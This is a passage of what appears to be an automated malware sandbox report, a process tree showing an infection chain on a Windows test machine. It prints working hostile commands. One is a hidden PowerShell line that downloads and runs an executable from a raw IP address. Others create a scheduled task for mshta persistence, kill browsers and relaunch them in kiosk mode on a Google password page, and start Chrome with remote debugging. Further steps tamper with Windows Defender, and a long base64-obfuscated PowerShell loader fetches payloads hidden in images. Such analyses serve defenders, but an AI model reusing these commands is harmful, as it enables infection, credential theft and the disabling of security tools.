                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2360
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2272
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2612
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn "Vgletmayucf" /tr "mshta \"C:\Temp\Nb3R50wmd.hta\"" /sc minute /mo 25 /ru "Admin" /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:2392
                      • C:\Windows\SysWOW64\mshta.exe
                        mshta "C:\Temp\Nb3R50wmd.hta"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies Internet Explorer settings
                        PID:2580
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                          9⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Downloads MZ/PE file
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2340
                          • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                            "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                            10⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1668
                    • C:\Users\Admin\AppData\Local\Temp\10301300101\cb06c496d7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301300101\cb06c496d7.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:3028
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 3028 -s 36
                        8⤵
                        • Loads dropped DLL
                        PID:2068
                    • C:\Users\Admin\AppData\Local\Temp\10301310101\a4cff801f5.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301310101\a4cff801f5.exe"
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2168
                    • C:\Users\Admin\AppData\Local\Temp\10301320101\ee82d42cb7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301320101\ee82d42cb7.exe"
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2752
                    • C:\Users\Admin\AppData\Local\Temp\10301330101\0b6be3303c.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301330101\0b6be3303c.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1356
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM firefox.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2940
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM chrome.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:320
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM msedge.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2196
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM opera.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2900
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM brave.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:596
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                        8⤵
                          PID:1048
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                            9⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:932
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.0.1055552953\1272439488" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d83eb3b4-5f63-425c-8204-18a5990a9376} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1308 12ac2b58 gpu
                              10⤵
                                PID:1468
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.1.519260175\1878158687" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae8b57ef-0dae-4757-b734-fb6d9a316265} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1504 f73f58 socket
                                10⤵
                                  PID:1552
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.2.1446915490\1179667951" -childID 1 -isForBrowser -prefsHandle 2088 -prefMapHandle 2084 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {262b92a7-44ae-43e1-a14f-b098b750a833} 932 "\\.\pipe\gecko-crash-server-pipe.932" 2100 12a5e358 tab
                                  10⤵
                                    PID:1884
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.3.1905500877\1921332935" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9968f50d-4d52-4ef3-b09a-386654f3dc4e} 932 "\\.\pipe\gecko-crash-server-pipe.932" 2908 f64558 tab
                                    10⤵
                                      PID:2672
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.4.413139501\1261447361" -childID 3 -isForBrowser -prefsHandle 3832 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {91b69759-88d6-480b-8869-0a206c723713} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3844 21072f58 tab
                                      10⤵
                                        PID:2932
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.5.2044931708\152666890" -childID 4 -isForBrowser -prefsHandle 3952 -prefMapHandle 3956 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {29da2c5c-1f4e-4d8e-a9d0-14c71fef6dab} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3940 21070b58 tab
                                        10⤵
                                          PID:2556
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.6.454103800\100205170" -childID 5 -isForBrowser -prefsHandle 4120 -prefMapHandle 4124 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8adc212d-439e-4d25-9827-4f3d7211dedc} 932 "\\.\pipe\gecko-crash-server-pipe.932" 4108 21340258 tab
                                          10⤵
                                            PID:2248
                                    • C:\Users\Admin\AppData\Local\Temp\10301340101\ddc845828c.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10301340101\ddc845828c.exe"
                                      7⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2552
                                    • C:\Users\Admin\AppData\Local\Temp\10301350101\cd3dfab0e4.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10301350101\cd3dfab0e4.exe"
                                      7⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Checks processor information in registry
                                      • Modifies system certificate store
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3236
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        8⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        PID:2964
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6619758,0x7fef6619768,0x7fef6619778
                                          9⤵
                                            PID:2272
                                          • C:\Windows\system32\ctfmon.exe
                                            ctfmon.exe
                                            9⤵
                                              PID:3504
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:2
                                              9⤵
                                                PID:1472
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                9⤵
                                                  PID:3452
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                  9⤵
                                                    PID:3160
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2328 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:1
                                                    9⤵
                                                    • Uses browser remote debugging
                                                    PID:3604
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2340 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:1
                                                    9⤵
                                                    • Uses browser remote debugging
                                                    PID:3624
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:2
                                                    9⤵
                                                      PID:3876
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=3304 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:1
                                                      9⤵
                                                      • Uses browser remote debugging
                                                      PID:3948
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1240 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                      9⤵
                                                        PID:3968
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1324 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                        9⤵
                                                          PID:3996
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                          9⤵
                                                            PID:3220
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\jm7qq" & exit
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4068
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 11
                                                            9⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Delays execution with timeout.exe
                                                            PID:3968
                                                      • C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:3988
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd.exe /c 1.bat && 2.js
                                                          8⤵
                                                            PID:4024
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic cpu get name
                                                              9⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4052
                                                            • C:\Windows\system32\find.exe
                                                              find "QEMU"
                                                              9⤵
                                                                PID:4060
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                                9⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2656
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
